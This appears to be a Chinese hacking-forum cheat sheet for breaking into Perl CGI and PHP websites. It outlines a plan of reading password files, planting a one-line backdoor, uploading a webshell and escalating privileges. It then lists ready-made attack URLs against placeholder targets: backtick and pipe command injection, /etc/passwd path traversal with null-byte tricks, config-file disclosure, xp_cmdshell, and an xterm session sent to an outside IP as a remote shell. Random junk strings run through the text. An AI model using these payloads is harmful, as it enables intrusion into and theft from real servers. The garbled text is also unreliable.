总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着 4 [4 Q( {2 P, f% D! B. I+ H% W
cookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权
- a7 L( L1 |8 w! Y/ v* e0 }感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们 # O& z6 W4 X% x5 z: \
注“
' X2 E" R7 d* |/ B) K9 O0 `perl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。
) W# N' V- K0 w以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET
! m( L2 @# L, Y5 ~9 E5 ^. Y9 W) S, I
http://target.com/cgi-bin/home/news/sub.pl?12 随意构造
+ [+ p, i* t1 k; Ohttp://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢
; S) ~/ m* {$ b8 f- l/ G9 H! ehttp://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号 $ |; m$ _6 p) C3 U$ D
http://target.com/cgi-bin/home/news/sub.pl?`id`
6 A# z4 H* y* {# f. Shttp://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a` $ l+ P" w9 { c. I O0 a
http://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示 ; q* }, e8 ]( X! e$ t' Q; R7 c3 N- b
# Q: G( i- T5 z* o# ahttp://target.com/test.pl;ls|
' U) J4 z7 C0 M% O3 b0 r# Ihttp://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| ( Y) F5 M8 Y/ C* O- M! w
http://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|
1 d {; D/ W1 Lhttp://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造 " O% l, I2 h2 r5 ]9 T* X2 Q
比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。
( D# {! }6 M0 k. ?- [! Ehttp://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection 7 Y0 }$ P# W0 k8 @4 J
, ^. G- l0 W$ y3 }+ C2 Lhttp://target.com/test.pl?&........ /../../etc/passwd 7 {9 S) h2 ^3 G# @: G
' R7 {9 n0 E% v" T, e3 b' S4 ]http://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./
' p; j3 S! a0 _6 Nhttp://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了 5 w/ _6 [2 x! n5 ~8 K( Z$ _1 H
http://www.target.org/cgi-bin/cl ... ../../etc/passwd%00 $ k# C, [3 l* d4 m1 [
) A) D5 k J ~; |http://www.target.org/show.php?f ... /include/config.php 查看php代码
, W: g3 W: ]7 }) A+ b4 ohttp://www.target.org/show.php?f ... ng/admin/global.php
" e& f( n& E2 |! c! r; Z: t6 D. l i9 D' Z9 K% t
emm和ps的一句话+ b j! W) m2 p& j- C" m } j
' i) _4 M! _& ?0 h$ Q$ k" U. r% p9 g
http://www.target.org/cgi-bin/cl ... /../../../bin/ls%20 ( G4 o8 r; j9 _- j$ U* l- a+ l
% R. C* H( G, K* z1 q- X) y>bbb%20| % Q; U" K0 p% V) F/ d1 w& k. i
1 d9 S: S+ B3 zhttp://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串
9 ]: |5 E1 H" @5 d* \4 J
! T; z& \' Z8 _. Ihttp://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征
3 F# R& R6 a+ E9 ^" Dhttp://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin 0 D/ B0 @1 C5 x4 G
4 | d; G( A9 ]/ v# x3 N& o7 X% B
相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法 ) l7 W2 w/ V$ Y0 H5 }
http://target.com/index.html#cmd.exe % K* ^7 V3 l* V1 i
http://target.com/index.html?dummyparam=xp_cmdshell
$ R+ H: K( Y" m7 y& }+ Zlynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd
) Q$ m2 G8 H# }, q: ~, `8 ^ |